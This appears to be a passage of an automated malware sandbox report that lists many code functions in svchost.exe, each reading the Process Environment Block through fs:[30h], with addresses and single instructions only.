            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BEA250 mov eax, dword ptr fs:[00000030h] | 1_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB8243 mov eax, dword ptr fs:[00000030h] | 1_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB8243 mov ecx, dword ptr fs:[00000030h] | 1_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h] | 1_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h] | 1_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h] | 1_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h] | 1_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h] | 1_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h] | 1_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h] | 1_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C061E5 mov eax, dword ptr fs:[00000030h] | 1_2_03C061E5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B70185 mov eax, dword ptr fs:[00000030h] | 1_2_03B70185
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BEC188 mov eax, dword ptr fs:[00000030h] | 1_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BEC188 mov eax, dword ptr fs:[00000030h] | 1_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD4180 mov eax, dword ptr fs:[00000030h] | 1_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD4180 mov eax, dword ptr fs:[00000030h] | 1_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B601F8 mov eax, dword ptr fs:[00000030h] | 1_2_03B601F8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h] | 1_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h] | 1_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h] | 1_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h] | 1_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h] | 1_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF61C3 mov eax, dword ptr fs:[00000030h] | 1_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF61C3 mov eax, dword ptr fs:[00000030h] | 1_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B60124 mov eax, dword ptr fs:[00000030h] | 1_2_03B60124
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C04164 mov eax, dword ptr fs:[00000030h] | 1_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C04164 mov eax, dword ptr fs:[00000030h] | 1_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDA118 mov ecx, dword ptr fs:[00000030h] | 1_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h] | 1_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h] | 1_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h] | 1_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF0115 mov eax, dword ptr fs:[00000030h]1_2_03BF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C156 mov eax, dword ptr fs:[00000030h]1_2_03B2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC8158 mov eax, dword ptr fs:[00000030h]1_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36154 mov eax, dword ptr fs:[00000030h]1_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36154 mov eax, dword ptr fs:[00000030h]1_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov ecx, dword ptr fs:[00000030h]1_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF60B8 mov eax, dword ptr fs:[00000030h]1_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B280A0 mov eax, dword ptr fs:[00000030h]1_2_03B280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC80A8 mov eax, dword ptr fs:[00000030h]1_2_03BC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3208A mov eax, dword ptr fs:[00000030h]1_2_03B3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]1_2_03B2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B720F0 mov ecx, dword ptr fs:[00000030h]1_2_03B720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_03B2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B380E9 mov eax, dword ptr fs:[00000030h]1_2_03B380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB60E0 mov eax, dword ptr fs:[00000030h]1_2_03BB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB20DE mov eax, dword ptr fs:[00000030h]1_2_03BB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC6030 mov eax, dword ptr fs:[00000030h]1_2_03BC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A020 mov eax, dword ptr fs:[00000030h]1_2_03B2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C020 mov eax, dword ptr fs:[00000030h]1_2_03B2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]1_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]1_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]1_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]1_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB4000 mov ecx, dword ptr fs:[00000030h]1_2_03BB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5C073 mov eax, dword ptr fs:[00000030h]1_2_03B5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B32050 mov eax, dword ptr fs:[00000030h]1_2_03B32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6050 mov eax, dword ptr fs:[00000030h]1_2_03BB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B307AF mov eax, dword ptr fs:[00000030h]1_2_03B307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE47A0 mov eax, dword ptr fs:[00000030h]1_2_03BE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD678E mov eax, dword ptr fs:[00000030h]1_2_03BD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B347FB mov eax, dword ptr fs:[00000030h]1_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B347FB mov eax, dword ptr fs:[00000030h]1_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]1_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]1_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]1_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]1_2_03BBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]1_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB07C3 mov eax, dword ptr fs:[00000030h]1_2_03BB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6273C mov eax, dword ptr fs:[00000030h]1_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6273C mov ecx, dword ptr fs:[00000030h]1_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6273C mov eax, dword ptr fs:[00000030h]1_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAC730 mov eax, dword ptr fs:[00000030h]1_2_03BAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C720 mov eax, dword ptr fs:[00000030h]1_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C720 mov eax, dword ptr fs:[00000030h]1_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30710 mov eax, dword ptr fs:[00000030h]1_2_03B30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B60710 mov eax, dword ptr fs:[00000030h]1_2_03B60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C700 mov eax, dword ptr fs:[00000030h]1_2_03B6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38770 mov eax, dword ptr fs:[00000030h]1_2_03B38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30750 mov eax, dword ptr fs:[00000030h]1_2_03B30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBE75D mov eax, dword ptr fs:[00000030h]1_2_03BBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72750 mov eax, dword ptr fs:[00000030h]1_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72750 mov eax, dword ptr fs:[00000030h]1_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB4755 mov eax, dword ptr fs:[00000030h]1_2_03BB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6674D mov esi, dword ptr fs:[00000030h]1_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6674D mov eax, dword ptr fs:[00000030h]1_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6674D mov eax, dword ptr fs:[00000030h]1_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B666B0 mov eax, dword ptr fs:[00000030h]1_2_03B666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]1_2_03B6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34690 mov eax, dword ptr fs:[00000030h]1_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34690 mov eax, dword ptr fs:[00000030h]1_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB06F1 mov eax, dword ptr fs:[00000030h]1_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB06F1 mov eax, dword ptr fs:[00000030h]1_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]1_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E627 mov eax, dword ptr fs:[00000030h]1_2_03B4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B66620 mov eax, dword ptr fs:[00000030h]1_2_03B66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68620 mov eax, dword ptr fs:[00000030h]1_2_03B68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3262C mov eax, dword ptr fs:[00000030h]1_2_03B3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72619 mov eax, dword ptr fs:[00000030h]1_2_03B72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE609 mov eax, dword ptr fs:[00000030h]1_2_03BAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B62674 mov eax, dword ptr fs:[00000030h]1_2_03B62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF866E mov eax, dword ptr fs:[00000030h]1_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF866E mov eax, dword ptr fs:[00000030h]1_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A660 mov eax, dword ptr fs:[00000030h]1_2_03B6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A660 mov eax, dword ptr fs:[00000030h]1_2_03B6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4C640 mov eax, dword ptr fs:[00000030h]1_2_03B4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B545B1 mov eax, dword ptr fs:[00000030h]1_2_03B545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B545B1 mov eax, dword ptr fs:[00000030h]1_2_03B545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB05A7 mov eax, dword ptr fs:[00000030h]1_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB05A7 mov eax, dword ptr fs:[00000030h]1_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB05A7 mov eax, dword ptr fs:[00000030h]1_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E59C mov eax, dword ptr fs:[00000030h]1_2_03B6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B32582 mov eax, dword ptr fs:[00000030h]1_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B32582 mov ecx, dword ptr fs:[00000030h]1_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B64588 mov eax, dword ptr fs:[00000030h]1_2_03B64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B325E0 mov eax, dword ptr fs:[00000030h]1_2_03B325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C5ED mov eax, dword ptr fs:[00000030h]1_2_03B6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C5ED mov eax, dword ptr fs:[00000030h]1_2_03B6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B365D0 mov eax, dword ptr fs:[00000030h]1_2_03B365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03B6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03B6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E5CF mov eax, dword ptr fs:[00000030h]1_2_03B6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E5CF mov eax, dword ptr fs:[00000030h]1_2_03B6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC6500 mov eax, dword ptr fs:[00000030h]1_2_03BC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6656A mov eax, dword ptr fs:[00000030h]1_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6656A mov eax, dword ptr fs:[00000030h]1_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6656A mov eax, dword ptr fs:[00000030h]1_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38550 mov eax, dword ptr fs:[00000030h]1_2_03B38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38550 mov eax, dword ptr fs:[00000030h]1_2_03B38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B644B0 mov ecx, dword ptr fs:[00000030h]1_2_03B644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]1_2_03BBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B364AB mov eax, dword ptr fs:[00000030h]1_2_03B364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEA49A mov eax, dword ptr fs:[00000030h]1_2_03BEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B304E5 mov ecx, dword ptr fs:[00000030h]1_2_03B304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E420 mov eax, dword ptr fs:[00000030h]1_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E420 mov eax, dword ptr fs:[00000030h]1_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E420 mov eax, dword ptr fs:[00000030h]1_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C427 mov eax, dword ptr fs:[00000030h]1_2_03B2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
